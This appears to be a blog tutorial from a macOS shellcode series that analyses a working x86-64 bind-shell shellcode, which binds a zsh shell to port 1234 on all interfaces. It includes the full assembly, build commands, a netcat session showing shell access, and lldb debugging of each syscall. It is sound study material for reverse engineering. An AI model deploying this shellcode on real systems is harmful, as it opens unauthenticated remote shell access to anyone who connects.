Binding a shell

Binding a shell

MacOS Shellcode Primer #3

Abstract

In this series of articles, I am analysing the pieces of shellcode written by Odzhan on the page Shellcode: Mac OSX amd64.

In the last article, Some more shellcode I showed some basic static and dynamic binary analysis using Hopper.

In this article, a more complex task is accomplished - we want to create some code that binds a shell.

Binding a Shell

This is the wet dream of all hackers - and conversely, it is the nightmare of all blue teamers. The effect of this shellcode is opening a shell that's accessible via netcat on port 1234.

The code

We start from the code:

; 91 bytes bind shell
;
bits    64

global _main
_main:

    mov     eax, ~0xd2040200 & 0xFFFFFFFF
    not     eax
    push    rax

    xor     ebp, ebp
    bts     ebp, 25

    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    rbp
    pop     rax              ; rax = 0x02000000
    cdq                      ; rdx = IPPROTO_IP
    push    1
    pop     rsi              ; rsi = SOCK_STREAM
    push    2
    pop     rdi              ; rdi = AF_INET
    mov     al, 97           ; eax = sys_socket
    syscall

    xchg    eax, edi         ; edi=s
    xchg    eax, ebx         ; ebx=2

    ; step 2, bind to port 1234
    ; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
    push    rbp
    pop     rax
    push    rsp
    pop     rsi
    mov     dl, 16
    mov     al, 104
    syscall

    ; step 3, listen
    ; listen(s, 0);
    push    rax
    pop     rsi
    push    rbp
    pop     rax
    mov     al, 106
    syscall

    ; step 4, accept connections
    ; accept(s, 0, 0);
    push    rbp
    pop     rax
    mov     al, 30
    cdq
    syscall

    xchg    eax, edi         ; edi=r
    push    rbx              ; rsi=2
    pop     rsi

    ; step 5, assign socket handle to stdin,stdout,stderr
    ; dup2(r, FILENO_STDIN)
    ; dup2(r, FILENO_STDOUT)
    ; dup2(r, FILENO_STDERR)
dup_loop64:
    push    rbp
    pop     rax
    mov     al, 90           ; rax=sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed

    ; step 6, execute /bin/zsh
    ; execve("/bin/zsh", {"/bin/zsh", NULL}, 0);
    xor     esi, esi
    cdq                      ; rdx=0
    mov     rbx, '/bin/zsh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    ; ---------
    push    rbp
    pop     rax
    mov     al, 59           ; rax=sys_execve
    syscall

The only detail that's been changed from the original code is the chosen shell. We opted for zsh because nowadays Apple has decided it's the default shell with MacOS. The original shell was /bin//sh (observe the double slash...).

Running the code

In a terminal, I launch:

gbiondo@tripleX Odzhan % ./bindshell

(no output is produced)

In another terminal, I launch:

gbiondo@tripleX shellcode2 % nc localhost 1234
pwd
/Users/gbiondo/EXP312/Odzhan
time

real    0m0.001s
user    0m0.000s
sys    0m0.000s
date
Wed Apr 13 14:52:30 BST 2022
echo $SHELL
/bin/zsh
whoami
gbiondo

Try and imagine: the software you are running opens a shell that can be reachable from the outside - this is very dangerous.

Some static binary analysis

file

gbiondo@tripleX Odzhan % file bindshell
bindshell: Mach-O 64-bit executable x86_64

Nothing we didn't know before, actually

Symbol Table

gbiondo@tripleX Odzhan % objdump -m -t bindshell
bindshell:

SYMBOL TABLE:
0000000100003f96 l     F __TEXT,__text dup_loop64
0000000100000000 g       *ABS* __mh_execute_header
0000000100003f5d g     F __TEXT,__text _main

Nothing too interesting, actually.

Section headers

gbiondo@tripleX Odzhan % objdump -m -h bindshell

Sections:
Idx Name          Size     VMA              Type
  0 __text        0000005b 0000000100003f5d TEXT
  1 __unwind_info 00000048 0000000100003fb8 DATA

Also this one is not too talkative :)

Null-byte sanitization

Before doing anything else, we agree on subdividing the code into logical blocks.

We agree on the following:

  • we call the preamble of the program preamble. It ends before the code introduced with the comment ; step 1, create a socket
  • we will refer to the block of code between the comments ; step 1, create a socket and ; step 2, bind to port 1234 with socket
  • we will refer to the block of code between the comments ; step 2, bind to port 1234 and ; step 3, listen with bind
  • we will refer to the block of code between the comments ; step 3, listen and ; step 4, accept connections with listen
  • we will refer to the block of code between the comments ; step 4, accept connections and ; step 5, assign socket handle to stdin,stdout,stderr with accept connections
  • we will refer to the block of code between the comments ; step 5, assign socket handle to stdin, stdout, stderr and ; step 6, execute /bin/zsh with handle management
  • we will refer to the rest of the code with shell execution

For reasons that will be evident later on, we need to have a null-byte-free code. A null-byte is actually a byte that's zeroed in the code. An example can explain the situation better. If we take a look at the opcodes in the disassembled object file of cmdRun, the program we used in Some more shellcode, in the subroutine <l_cmd64> we see:

gbiondo@tripleX Odzhan % objdump -D -M intel cmdRun.o

cmdRun.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

--8< --8< --8< SNIP --8< --8< --8< 

0000000000000026 <l_cmd64>:
      26: e8 f5 ff ff ff                   call    0x20 <r_cmd64>
      2b: 63 61 74                         movsxd    esp, dword ptr [rcx + 116]
      2e: 20 2f                            and    byte ptr [rdi], ch
      30: 65 74 63                         je    0x96 <l_cmd64+0x70>
      33: 2f                               <unknown>
      34: 70 61                            jo    0x97 <l_cmd64+0x71>
      36: 73 73                            jae    0xab <l_cmd64+0x85>
      38: 77 64                            ja    0x9e <l_cmd64+0x78>
      3a: 00                               <unknown>

The byte in 3a is 00 - there is acceptable because of the structure of the program, but in general, we want to avoid these bytes.

So, now we want to check if we have any null-byte in the opcodes.

We do it part by part.

Preamble

This part is null-byte free:

gbiondo@tripleX bindshell_files % nasm -f macho64 preamble.asm 
gbiondo@tripleX bindshell_files % objdump -D -M intel preamble.o 

preamble.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <_main>:
       0: b8 ff fd fb 2d                   mov    eax, 771489279
       5: f7 d0                            not    eax
       7: 50                               push    rax
       8: 31 ed                            xor    ebp, ebp
       a: 0f ba ed 19                      bts    ebp, 25

Socket

Also this part is null-byte free:

gbiondo@tripleX bindshell_files % nasm -f macho64 socket.asm    
gbiondo@tripleX bindshell_files % objdump -D -M intel socket.o 

socket.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <__text>:
       0: 55                               push    rbp
       1: 58                               pop    rax
       2: 99                               cdq
       3: 6a 01                            push    1
       5: 5e                               pop    rsi
       6: 6a 02                            push    2
       8: 5f                               pop    rdi
       9: b0 61                            mov    al, 97
       b: 0f 05                            syscall
       d: 97                               xchg    eax, edi
       e: 93                               xchg    eax, ebx

Bind

Another part with no null-bytes:

gbiondo@tripleX bindshell_files % nasm -f macho64 bind.asm    
gbiondo@tripleX bindshell_files % objdump -D -M intel bind.o

bind.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <__text>:
       0: 55                               push    rbp
       1: 58                               pop    rax
       2: 54                               push    rsp
       3: 5e                               pop    rsi
       4: b2 10                            mov    dl, 16
       6: b0 68                            mov    al, 104
       8: 0f 05                            syscall

Listen

No null-bytes here...

gbiondo@tripleX bindshell_files % nasm -f macho64 listen.asm 
gbiondo@tripleX bindshell_files % objdump -D -M intel listen.o 

listen.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <__text>:
       0: 50                               push    rax
       1: 5e                               pop    rsi
       2: 55                               push    rbp
       3: 58                               pop    rax
       4: b0 6a                            mov    al, 106
       6: 0f 05                            syscall

Accept connections

... nor here. Bo-ring!

gbiondo@tripleX bindshell_files % nasm -f macho64 acceptConnections.asm 
gbiondo@tripleX bindshell_files % objdump -D -M intel acceptConnections.o 

acceptConnections.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <__text>:
       0: 55                               push    rbp
       1: 58                               pop    rax
       2: b0 1e                            mov    al, 30
       4: 99                               cdq
       5: 0f 05                            syscall
       7: 97                               xchg    eax, edi
       8: 53                               push    rbx
       9: 5e                               pop    rsi

Handle management

Ibid

gbiondo@tripleX bindshell_files % nasm -f macho64 handleManagement.asm   
gbiondo@tripleX bindshell_files % objdump -D -M intel handleManagement.o 

handleManagement.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <dup_loop64>:
       0: 55                               push    rbp
       1: 58                               pop    rax
       2: b0 5a                            mov    al, 90
       4: 0f 05                            syscall
       6: 83 ee 01                         sub    esi, 1
       9: 79 f5                            jns    0x0 <dup_loop64>

Shell execution

Ibid

gbiondo@tripleX bindshell_files % nasm -f macho64 shell.asm             
gbiondo@tripleX bindshell_files % objdump -D -M intel shell.o           

shell.o:    file format mach-o 64-bit x86-64

Disassembly of section __TEXT,__text:

0000000000000000 <__text>:
       0: 31 f6                            xor    esi, esi
       2: 99                               cdq
       3: 48 bb 2f 62 69 6e 2f 2f 73 68    movabs    rbx, 7526411283028599343
       d: 52                               push    rdx
       e: 53                               push    rbx
       f: 54                               push    rsp
      10: 5f                               pop    rdi
      11: 55                               push    rbp
      12: 58                               pop    rax
      13: b0 3b                            mov    al, 59
      15: 0f 05                            syscall

Commentary

All these pieces of code are null-byte free on purpose. The original author has written the code as such because he wanted to have a portable shellcode.

In a subsequent article, I will explain some techniques that can be used to obtain clean shellcode. For the very moment, the objective of this part of the article was showing this part of shellcode development.

Dynamic binary analysis

Also in this case, we can use the taxonomy defined above to keep the structure a bit more readable.

If not done yet, we start with the compilation, linking of the executable. The last instruction attaches lldb to the process.

gbiondo@tripleX bindshell_files % nasm -f macho64 bindshell.asm  
gbiondo@tripleX bindshell_files % ld -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib -lSystem bindshell.o -o bindshell
gbiondo@tripleX bindshell_files % lldb bindshell

We set a breakpoint in the main subroutine, and we're ready to go.

(lldb) breakpoint set -n main
Breakpoint 1: where = bindshell`main, address = 0x0000000100003f5d

Preamble

The preamble disassembled code is as follows:

bindshell[0x100003f5d] <+0>:  mov    eax, 0x2dfbfdff
bindshell[0x100003f62] <+5>:  not    eax
bindshell[0x100003f64] <+7>:  push   rax
bindshell[0x100003f65] <+8>:  xor    ebp, ebp
bindshell[0x100003f67] <+10>: bts    ebp, 0x19

The readers should be familiar with the instruction mov, by now - so I am not going to explain it. On the other hand, it is interesting to understand how ~0xd2040200 & 0xFFFFFFFF becomes 0x2dfbfdff. The operand & does a bitwise AND, thus the & 0xFFFFFFFF can be disregarded (FF is all one's, which is the neutral element for the & operation. The tilde ~ operand inverts the bytes. I have prepared an image that explains how the operation went here - a picture is worth more than a thousand words, after all...

Tabella Complemento.png

We start the process and begin debugging. Before the execution of instruction at <+0> we have:

(lldb) register read RAX EAX
     rax = 0x0000000100074010  dyld`dyld4::sConfigBuffer
     eax = 0x00074010

and after it, obviously, we obtain:

(lldb) register read RAX EAX
     rax = 0x000000002dfbfdff
     eax = 0x2dfbfdff

Now the following instruction (at <+5>) is a NOT, and after its execution, we have:

(lldb) register read RAX EAX RSP
     rax = 0x00000000d2040200
     eax = 0xd2040200
     rsp = 0x00007ff7bfeff818

Unsurprisingly! NOT is involutory! This has all been done in order to avoid storing null bytes.

The next instruction (<+7>) stores the contents of RAX in the stack (so, at the address 0x00007ff7bfeff810):

(lldb) register read RAX EAX RSP EBP
     rax = 0x00000000d2040200
     eax = 0xd2040200
     rsp = 0x00007ff7bfeff810
     ebp = 0xbfeff920
(lldb) memory read $rsp
0x7ff7bfeff810: 00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00  ................
0x7ff7bfeff820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

With the next instruction (<+8>) the contents of ebp are zeroed, and with the one after (<+10>) its 25th bit is set to 1:

(lldb) register read RAX EAX RSP EBP
     rax = 0x00000000d2040200
     eax = 0xd2040200
     rsp = 0x00007ff7bfeff810
     ebp = 0x02000000

This closes the analysis of the first chunk.

Socket

The disassembled code for Socket is:

    0x100003f6b <+14>: push   rbp
    0x100003f6c <+15>: pop    rax
    0x100003f6d <+16>: cdq    
    0x100003f6e <+17>: push   0x1
    0x100003f70 <+19>: pop    rsi
    0x100003f71 <+20>: push   0x2
    0x100003f73 <+22>: pop    rdi
    0x100003f74 <+23>: mov    al, 0x61
    0x100003f76 <+25>: syscall 
    0x100003f78 <+27>: xchg   eax, edi
    0x100003f79 <+28>: xchg   eax, ebx

The contents of rbp are stored in the stack (instruction <+14>), and then retrieved and pushed into rax (instruction <+15>).

(lldb) register read RAX EAX RSP EBP
     rax = 0x00000000d2040200
     eax = 0xd2040200
     rsp = 0x00007ff7bfeff808
     ebp = 0x02000000
(lldb) memory read $rsp
0x7ff7bfeff808: 00 00 00 02 00 00 00 00 00 02 04 d2 00 00 00 00  ................
0x7ff7bfeff818: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................

and after instruction <+15>

(lldb) register read RAX EAX RSP EBP
     rax = 0x0000000002000000
     eax = 0x02000000
     rsp = 0x00007ff7bfeff810
     ebp = 0x02000000

Now, we have already seen the CDQ instruction (converts a doubleword to a quadword) and the fact it zeroes the values of EDX and EAX (in this case, because the first register is positive). Shortly, before instruction <+16> we have

(lldb) register read RSP EBP    DX AX EDX EAX RDX RAX
     rsp = 0x00007ff7bfeff810
     ebp = 0x02000000
      dx = 0xf958
      ax = 0x0000
     edx = 0xbfeff958
     eax = 0x02000000
     rdx = 0x00007ff7bfeff958
     rax = 0x0000000002000000

and after it, we have

     rsp = 0x00007ff7bfeff810
     ebp = 0x02000000
      dx = 0x0000
      ax = 0x0000
     edx = 0x00000000
     eax = 0x02000000
     rdx = 0x0000000000000000
     rax = 0x0000000002000000

Then 1 is pushed in the stack (instruction <+17>):

(lldb) memory read $rsp
0x7ff7bfeff808: 01 00 00 00 00 00 00 00 00 02 04 d2 00 00 00 00  ................
0x7ff7bfeff818: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................
(lldb) register read RSP EBP RSI RDI DX AX EDX EAX RDX RAX
     rsp = 0x00007ff7bfeff808
     ebp = 0x02000000
     rsi = 0x00007ff7bfeff948
     rdi = 0x0000000000000001
      dx = 0x0000
      ax = 0x0000
     edx = 0x00000000
     eax = 0x02000000
     rdx = 0x0000000000000000
     rax = 0x0000000002000000

and popped back into rsi (instruction <+19>).

(lldb) register read RSP EBP RSI RDI DX AX EDX EAX RDX RAX
     rsp = 0x00007ff7bfeff810
     ebp = 0x02000000
     rsi = 0x0000000000000001
     rdi = 0x0000000000000001
      dx = 0x0000
      ax = 0x0000
     edx = 0x00000000
     eax = 0x02000000
     rdx = 0x0000000000000000
     rax = 0x0000000002000000
(lldb) memory read $rsp
0x7ff7bfeff810: 00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00  ................
0x7ff7bfeff820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

Similarly, the instructions <+20> and <+22> store the value 2 in rdi, leading to the following situation:

(lldb) register read RSP EBP RSI RDI DX AX EDX EAX RDX RAX
     rsp = 0x00007ff7bfeff810
     ebp = 0x02000000
     rsi = 0x0000000000000001
     rdi = 0x0000000000000002
      dx = 0x0000
      ax = 0x0000
     edx = 0x00000000
     eax = 0x02000000
     rdx = 0x0000000000000000
     rax = 0x0000000002000000

The very next instruction (<+23>) moves 0x61 in the lowest 8 bits of eax. 0x61 in decimal is 97. If we look in the syscalls.master file, we immediately notice that this is the number associated to the syscall socket.

Now, a man 2 socket gives the description of the command, which in C would be invoked as follows:

     #include <sys/socket.h>

     int
     socket(int domain, int type, int protocol);

Shortly, socket() creates an endpoint for communication and returns a descriptor.

In the man page, we find the description of the parameters:

The domain parameter specifies a communications domain within which communication will take place; this selects the protocol family which should be used.

These families are defined in the include file ⟨sys/socket.h⟩. The currently understood formats are:

PF_LOCAL        Host-internal protocols, formerly called PF_UNIX,
PF_UNIX         Host-internal protocols, deprecated, use PF_LOCAL,
PF_INET         Internet version 4 protocols,
PF_ROUTE        Internal Routing protocol,
PF_KEY          Internal key-management function,
PF_INET6        Internet version 6 protocols,
PF_SYSTEM       System domain,
PF_NDRV         Raw access to network device,
PF_VSOCK        VM Sockets protocols

The socket has the indicated type, which specifies the semantics of communication. Currently defined types are:

SOCK_STREAM
SOCK_DGRAM
SOCK_RAW

A SOCK_STREAM type provides sequenced, reliable, two-way connection based byte streams. An out-of-band data transmission mechanism may be supported. A SOCK_DGRAM socket supports datagrams (connectionless, unreliable messages of a fixed (typically small) maximum length). SOCK_RAW sockets provide access to internal network protocols and interfaces. The type SOCK_RAW, which is available only to the super-user.

The protocol specifies a particular protocol to be used with the socket. Normally only a single protocol exists to support a particular socket type within a given protocol family. However, it is possible that many protocols may exist, in which case a particular protocol must be specified in this manner. The protocol number to use is particular to the “communication domain” in which communication is to take place; see protocols(5).

To understand what the author originally wanted to achieve, let's take a look at the code.

The original call to the socket() API was intended to be:

socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

In the socket.h we find the definition of AF_INET as follows:

#define AF_INET         2               /* internetwork: UDP, TCP, etc. */

So, AF_INET and PF_INET in this case behave in the same manner.

The author wants a TCP connection, so he decided to use SOCK_STREAM.

Also SOCK_STREAM is defined in socket.h:

#define SOCK_STREAM     1               /* stream socket */

Finally, to leverage the IP protocol, the third parameter to the function has to be IPPROTO_IP. This is defined in the in.h header:

#define IPPROTO_IP              0               /* dummy for IP */

To recap, the call should be invoked as:

socket(2,1,0)

so:

Param. no. Register Required value
1 RDI AF_INET = 2
2 RSI SOCK_STREAM = 1
3 RDX IPPROTO_IP = 0

Taking a look at the last status of the registers, we see that the program is ready to invoke the socket syscall.

Let's review the contents of the registers before and after the syscall:

Register Before After
RAX 0x0000000002000061 0x0000000000000003
RBX 0x00000001000c0060 0x00000001000c0060
RCX 0x00007ff7bfeffa80 0x0000000100003f78
RDX 0x0000000000000000 0x0000000000000000
RDI 0x0000000000000002 0x0000000000000002
RSI 0x0000000000000001 0x0000000000000001
RBP 0x0000000002000000 0x0000000002000000
RSP 0x00007ff7bfeff870 0x00007ff7bfeff870

We observe that the values of RAX and RCX have changed. In fact, RAX will contain the return value of socket, which is a file descriptor.

The part Socket finishes with the two XCHG instructions (<+27> and <+28>). The XCHG instruction exchanges the contents of a register with the contents of another register or the contents of memory locations. It cannot exchange the contents of two memory locations directly.

The effect of these two instructions are:

  • With the first one, the values of eax and edi are swapped.
  • With the second one, the values of eax (former value of edi) and ebx are swapped.

Shortly, we have:

Register Before After
RAX 0x0000000000000003 0x00000000000c0060
RBX 0x00000001000c0060 0x0000000000000002
RDI 0x0000000000000002 0x0000000000000003

Bind

This part is quite complex. The assembled code is not very different from the original - in fact, we have:

    0x100003f7a <+29>: push   rbp
    0x100003f7b <+30>: pop    rax
    0x100003f7c <+31>: push   rsp
    0x100003f7d <+32>: pop    rsi
    0x100003f7e <+33>: mov    dl, 0x10
    0x100003f80 <+35>: mov    al, 0x68
    0x100003f82 <+37>: syscall

whilst the pushes and the pops look quite familiar the mov instructions deserve some analysis.

The effect of the first two instructions is copying the contents of rbp into rax; and the effect of the third and fourth instructions is copying the contents of rsp into rsi. We show the first two instructions. With the first instruction (<+29>), the stack base pointer is pushed to the stack, and with the next instruction, it is popped in the RAX register. It's worth remembering that before the code was executed, the contents of RBP was 0x0000000002000000.

Before going any further, we observe that the code shall set the last 8 bits of rax (this is what al is) to 0x68, or in decimal 104. This is the number of syscall that will be called. A quick look in the syscalls.master file shows that this is the syscall:

104    AUE_BIND    ALL    { int bind(int s, caddr_t name, socklen_t namelen) NO_SYSCALL_STUB; }

so we know we need to invoke man 2 bind from the terminal to get some more information on the API. In this case, we have:

#include <sys/socket.h>

int bind(int socket, const struct sockaddr *address, socklen_t address_len);

bind() assigns a name to an unnamed socket. When a socket is created with socket(2) it exists in a name space (address family) but has no name assigned. bind() requests that address be assigned to the socket.

The second parameter to this call is of type struct sockaddr and the third is basically an integer containing the length of that structure.

We need to do some reverse engineering of the Apple XNU code, now.

The struct sockaddr is described in the file in.h we have:

struct sockaddr_in {
    __uint8_t       sin_len;
    sa_family_t     sin_family;
    in_port_t       sin_port;
    struct  in_addr sin_addr;
    char            sin_zero[8];
};

In order to find the third parameter, we need to determine the sizes of all types. In the same file, we immediately find

struct in_addr {
    in_addr_t s_addr;
};

so we need to give a size to the following types:

Data type Defined in
sa_family_t _sa_family_t.h
in_port_t _in_port_t.h
in_addr in.h

To speed up things, we wrote a little program to find the sizes of the integer types:

#include <iostream>
#include <inttypes.h>

using namespace std;

int main ()
{
  cout << "sizeof size_t type is: " << sizeof(size_t) << " bytes\n";
  cout << "sizeof char type is: " << sizeof(char) << " bytes\n";
  cout << "sizeof uint8_t type is: " << sizeof(uint8_t) << " bytes\n";
  cout << "sizeof __uint8_t type is: " << sizeof(__uint8_t) << " bytes\n";
  cout << "sizeof uint16_t type is: " << sizeof(uint16_t) << " bytes\n";
  cout << "sizeof __uint16_t type is: " << sizeof(__uint16_t) << " bytes\n";
  cout << "sizeof uint32_t type is: " << sizeof(uint32_t) << " bytes\n";
  cout << "sizeof __uint32_t type is: " << sizeof(__uint32_t) << " bytes\n";
  cout << "sizeof uint64_t type is: " << sizeof(uint64_t) << " bytes\n";
  cout << "sizeof __uint64_t type is: " << sizeof(__uint64_t) << " bytes\n";
  return 0;
}

running it gives us:

sizeof size_t type is: 8 bytes
sizeof char type is: 1 bytes
sizeof uint8_t type is: 1 bytes
sizeof __uint8_t type is: 1 bytes
sizeof uint16_t type is: 2 bytes
sizeof __uint16_t type is: 2 bytes
sizeof uint32_t type is: 4 bytes
sizeof __uint32_t type is: 4 bytes
sizeof uint64_t type is: 8 bytes
sizeof __uint64_t type is: 8 bytes

So, let's enrich the previous table:

Data type Defined in Aliases Size
char n/a n/a 1 byte
uint8_t n/a unsigned char 1 byte
sa_family_t _sa_family_t.h __uint8_t 1 byte
in_port_t _in_port_t.h __uint16_t 2 bytes
in_addr in.h in_addr_t n/a
in_addr_t _in_addr_t.h __uint32_t 4 bytes

To fix the ideas, the struct sockaddr_in has the following sizes

struct sockaddr_in {
    __uint8_t       sin_len;            //1 byte
    sa_family_t     sin_family;         //1 byte
    in_port_t       sin_port;           //2 bytes
    struct  in_addr sin_addr;           //4 bytes
    char            sin_zero[8];        //8 bytes
};

In short, this structure is 16 bytes long. We can represent it graphically as follows:

memory layout.png

At the very moment, the situation is as follows:

Param. no. Register Value
1 RDI 0x0000000000000003
2 RSI 0x00007ff7bfeff870
3 RDX 0x0000000000000000

Let's go back to the code. The effect of the instruction <+33> is to load 0x10 = 16 to the last 8 bits of rdx, thus setting the third parameter (the size) to the bind() call.

In a similar way, the instruction <+35> prepares the syscall by finalising its number.

In short, we have:

     rdi = 0x0000000000000003
     rsi = 0x00007ff7bfeff870
     rdx = 0x0000000000000010
     rax = 0x0000000002000068

Now it's interesting to see the values of the structure. Let's read 16 bytes of the stack, starting from rsi:

(lldb) register read rsi
     rsi = 0x00007ff7bfeff870
(lldb) memory read $rsi-0x10 $rsi+0x10
0x7ff7bfeff860: 14 00 00 00 00 00 00 00 70 f8 ef bf f7 7f 00 00  ........p.......
0x7ff7bfeff870: 00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00  ................

Now, using the graphical schema that we have shown before will help visualising memory allocation:

memory 2.png

00 00 00 00 is a constant defined in in.h (the symbolic name is INADDR_ANY) and represents any possible internet address - in other words, the shellcode will accept incoming connections from any host.

This closes the analysis of bind. Phew!

Listen

The disassembled code for this chunk doesn't differ from the original:

    0x100003f84 <+39>: push   rax
    0x100003f85 <+40>: pop    rsi
    0x100003f86 <+41>: push   rbp
    0x100003f87 <+42>: pop    rax
    0x100003f88 <+43>: mov    al, 0x6a
    0x100003f8a <+45>: syscall

Here the syscall has number 106, which is defined in the syscalls.master file as follows:

106    AUE_LISTEN    ALL    { int listen(int s, int backlog) NO_SYSCALL_STUB; }

so, we follow the methodology that we adopted before - it should be clear by now that the first thing to do is launching man 2 listen and analysing the result. In this case, the API is defined as follows:

#include <sys/socket.h>

int listen(int socket, int backlog);

Creation of socket-based connections requires several operations. First, a socket is created with socket(2). Next, a willingness to incoming connections and a queue limit for incoming connections are specified with listen(). Finally, the connections are accepted with accept(2). The listen() call applies only to sockets of type SOCK_STREAM.

The backlog parameter defines the maximum length for the queue of pending connections. If a connection request arrives with the queue full, the client may receive an error with an indication of ECONNREFUSED. Alternatively, if the underlying protocol supports retransmission, the request may be ignored so that retries may succeed.

In this case, we are happy with no backlog management, so we will pass a zero (NULL) value.

The instructions <+39> to <+42> set the contents of RSI to those of RAX, and the contents of RAX to those of RBP:

Register Before After
RAX 0x0000000000000000 0x0000000002000000
RBP 0x0000000002000000 0x0000000002000000
RSI 0x00007ff7bfeff870 0x0000000000000000

The final effect is zeroing RSI (which is fine, because RSI is what is used to pass the second arguments to functions) and preparing RAX for the syscall. The first argument to the function is passed through the register RDI that has been set before and not changed yet.

(lldb) register read rdi
     rdi = 0x0000000000000003

So, the effect of the instruction <+43> is to set the lowest byte of rax to 106 and prepare for the syscall which is in <+45>.

Accepting incoming connections

I must admit I have been a little puzzled by the remaining part of the disassembled code. Before commenting, let's take a look at what we have:

bindshell[0x100003f8c] <+47>: push   rbp
bindshell[0x100003f8d] <+48>: pop    rax
bindshell[0x100003f8e] <+49>: mov    al, 0x1e
bindshell[0x100003f90] <+51>: cdq    
bindshell[0x100003f91] <+52>: syscall 
bindshell[0x100003f93] <+54>: xchg   eax, edi
bindshell[0x100003f94] <+55>: push   rbx
bindshell[0x100003f95] <+56>: pop    rsi

There is only ONE syscall invocation, and there are no jump instructions, hence no loop.

The effect of the instructions <+47>...<+49> is preparing the syscall. The syscall number is 0x1e, or in decimal 30.

The reason for this is my shallowness when analysing. I disassembled the main subroutine, but as a matter of fact, the loop takes place in a labeled environment, which is another subroutine. In fact, if I execute:

(lldb) disassemble -n dup_loop64
bindshell`dup_loop64:
bindshell[0x100003f96] <+0>:  push   rbp
bindshell[0x100003f97] <+1>:  pop    rax
bindshell[0x100003f98] <+2>:  mov    al, 0x5a
bindshell[0x100003f9a] <+4>:  syscall 
bindshell[0x100003f9c] <+6>:  sub    esi, 0x1
bindshell[0x100003f9f] <+9>:  jns    0x100003f96               ; <+0>
bindshell[0x100003fa1] <+11>: xor    esi, esi
bindshell[0x100003fa3] <+13>: cdq    
bindshell[0x100003fa4] <+14>: movabs rbx, 0x68732f2f6e69622f
bindshell[0x100003fae] <+24>: push   rdx
bindshell[0x100003faf] <+25>: push   rbx
bindshell[0x100003fb0] <+26>: push   rsp
bindshell[0x100003fb1] <+27>: pop    rdi
bindshell[0x100003fb2] <+28>: push   rbp
bindshell[0x100003fb3] <+29>: pop    rax
bindshell[0x100003fb4] <+30>: mov    al, 0x3b
bindshell[0x100003fb6] <+32>: syscall

I obtain the missing part of the code.

Now, if we look to other xnu versions, the API 30 is documented. Especially if we look at the URI: https://opensource.apple.com/source/xnu/xnu-7195.50.7.100.1/bsd/kern/syscalls.master.auto.html we have the following:

30    AUE_ACCEPT    ALL    { int accept(int s, caddr_t name, socklen_t    *anamelen) NO_SYSCALL_STUB; }

which is more actionable. Defined as

#include <sys/socket.h>

int accept(int socket, struct sockaddr *restrict address, socklen_t *restrict address_len);

the man page for this API contains:

The argument socket is a socket that has been created with socket(2), bound to an address with bind(2), and is listening for connections after a listen(2). accept() extracts the first connection request on the queue of pending connections, creates a new socket with the same properties of socket, and allocates a new file descriptor for the socket. If no pending connections are present on the queue, and the socket is not marked as non-blocking, accept() blocks the caller until a connection is present. If the socket is marked non-blocking and no pending connections are present on the queue, accept() returns an error as described below. The accepted socket may not be used to accept more connections. The original socket socket, remains open.

The argument address is a result parameter that is filled in with the address of the connecting entity, as known to the communications layer. The exact format of the address parameter is determined by the domain in which the communication is occurring. The address_len is a value-result parameter; it should initially contain the amount of space pointed to by address; on return it will contain the actual length (in bytes) of the address returned. This call is used with connection-based socket types, currently with SOCK_STREAM.

It is possible to select(2) a socket for the purposes of doing an accept() by selecting it for read.

Now let's reverse engineer this call. The status of the registers is:

Param. no. Register Value
1 RDI 0x0000000000000003
2 RSI 0x0000000000000030
3 RDX 0x0000000000000000

The first parameter is the usual file descriptor for the socket. Nothing new. As for the two remaining parameters, they are not very relevant here, as they are used when storing the address of the incoming requests.

Once the syscall is executed, the program accepts incoming connections, creating a file descriptor for it.

The values of RAX and RDI are exchanged, so RAX will contain the socket file descriptor and RDI the connection file descriptor (instruction <+54>).

The instructions <+55> and <+56> simply store the value of RBX into RSI.

Now the control flows reaches the dup_loop64 label. We enter the Handle management section.

Before getting there, let's dump the status of the registers:

(lldb) register read 
General Purpose Registers:
       rax = 0x0000000000000003
       rbx = 0x0000000000000002
       rcx = 0x0000000100003f93  bindshell`main + 54
       rdx = 0x0000000000000000
       rdi = 0x000000000000000e
       rsi = 0x0000000000000002
       rbp = 0x0000000002000000
       rsp = 0x00007ff7bfeff8a0
        r8 = 0x00000000001085b1
        r9 = 0xffffffff00000000
       r10 = 0x0000000000000000
       r11 = 0x0000000000000347
       r12 = 0x00000001000883a0  dyld`_NSConcreteStackBlock
       r13 = 0x00007ff7bfeff958
       r14 = 0x0000000100003f5d  bindshell`main
       r15 = 0x0000000100074010  dyld`dyld4::sConfigBuffer
       rip = 0x0000000100003f96  bindshell`dup_loop64
    rflags = 0x0000000000000247
        cs = 0x000000000000002b
        fs = 0x0000000000000000
        gs = 0x0000000000000000

Handle management

We need to redirect STDIN, STDOUT, and STDERR to the newly created connection. This is accomplished in this loop:

    0x100003f96 <+0>:  push   rbp
    0x100003f97 <+1>:  pop    rax
    0x100003f98 <+2>:  mov    al, 0x5a
    0x100003f9a <+4>:  syscall 
    0x100003f9c <+6>:  sub    esi, 0x1
    0x100003f9f <+9>:  jns    0x100003f96               ; <+0>

